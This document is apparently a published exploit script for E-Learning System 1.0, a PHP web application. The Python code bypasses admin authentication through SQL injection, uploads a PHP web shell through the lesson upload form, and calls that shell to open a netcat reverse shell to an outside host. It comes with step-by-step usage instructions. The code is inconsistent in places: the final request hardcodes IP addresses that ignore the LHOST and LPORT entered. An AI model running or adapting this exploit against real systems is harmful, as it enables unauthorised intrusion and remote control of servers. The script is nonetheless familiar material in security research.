# Exploit Title: E-Learning System 1.0 - Authentication Bypass & RCE # Exploit Author: Himanshu Shukla & Saurav Shukla # Date: 2021-01-15 # Vendor Homepage: https://www.sourcecodester.com/php/12808/e-learning-system-using-phpmysqli.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/caiwl.zip # Version: 1.0 # Tested On: Kali Linux + XAMPP 7.4.4 # Description: E-Learning System 1.0 - Authentication Bypass Via SQL Injection + Remote Code Execution #Step 1: run the exploit in python with this command: python3 exploit.py #Step 2: Input the URL of the vulnerable application: Example: http://10.10.10.23/caiwl/ #Step 3: Input your LHOST where you want the reverse shell: Example: 10.9.192.23 #Step 4: Input your LPORT that is the port where the reverse shell will spawn: Example: 4444 #Step 5: Start a Netcat Listener on the port specified in Step 4 using this command: nc -lnvp 4444 #Step 6: Hit enter on the if your Netcat Listener is ready, and you will get a reverse shell as soon as you hit enter. import requests print('########################################################') print('## E-LEARNING SYSTEM 1.0 ##') print('## AUTHENTICATION BYPASS & REMOTE CODE EXECUTION ##') print('########################################################') print('Author - Himanshu Shukla & Saurav Shukla') GREEN = '\033[32m' # Green Text RED = '\033[31m' # Red Text RESET = '\033[m' # reset to the defaults #Create a new session s = requests.Session() #Set Cookie cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'} LINK=input("Enter URL of The Vulnarable Application : ") #Authentication Bypass print("[*]Attempting Authentication Bypass...") values = {"user_email":"'or 1 or'", "user_pass":"lol","btnLogin":""} r=s.post(LINK+'admin/login.php', data=values, cookies=cookies) r=s.post(LINK+'admin/login.php', data=values, cookies=cookies) #Check if Authentication was bypassed or not. logged_in = True if("You login as Administrator." in r.text) else False l=logged_in if l: print(GREEN+"[+]Authentication Bypass Successful!", RESET) else: print(RED+"[-]Failed To Authenticate!", RESET) #Creating a PHP Web Shell phpshell = { 'file': ( 'shell.php', '', 'application/x-php', {'Content-Disposition': 'form-data'} ) } # Defining value for form data data = {'LessonChapter':'test', 'LessonTitle':'test','Category':'Docs','save':''} #Uploading Reverse Shell print("[*]Uploading PHP Shell For RCE...") upload = s.post(LINK+'/admin/modules/lesson/controller.php?action=add', cookies=cookies, files=phpshell, data=data, verify=False) shell_upload = True if("window.location='index.php'" in upload.text) else False u=shell_upload if u: print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET) else: print(RED+"[-]Failed To Upload The PHP Shell!", RESET) print("[*]Please Input Reverse Shell Details") LHOST=input("[*]LHOST : ") LPORT=input("[*]LPORT : ") print('[*]Start Your Netcat Listener With This Command : nc -lvnp '+LPORT) input('[*]Hit Enter if your netcat shell is ready. ') print('[+]Deploying The Web Shell...') #Executing The Webshell e=s.get('http://192.168.1.5/caiwl/admin/modules/lesson/files/shell.php?cmd=nc 192.168.1.2 9999 -e /bin/bash', cookies=cookies) exit()